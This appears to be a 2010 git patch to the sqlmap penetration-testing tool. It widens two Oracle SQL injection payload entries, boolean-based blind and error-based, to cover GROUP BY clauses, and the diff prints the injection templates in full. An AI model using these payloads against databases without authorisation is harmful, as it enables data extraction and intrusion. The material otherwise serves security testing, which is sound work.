From 8ff7c9a5a16dbf12fa897e8a8dbecbd304c8b1e8 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 7 Dec 2010 17:17:01 +0000 Subject: [PATCH] Works on Oracle's GROUP BY too --- xml/payloads.xml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 78da84309..e79470751 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -712,11 +712,11 @@ Formats: - Oracle boolean-based blind - ORDER BY clause + Oracle boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 - 3 + 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) @@ -1169,11 +1169,11 @@ Formats: - Oracle error-based - ORDER BY clause + Oracle error-based - GROUP BY and ORDER BY clauses 2 3 0 - 3 + 2,3 1 , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)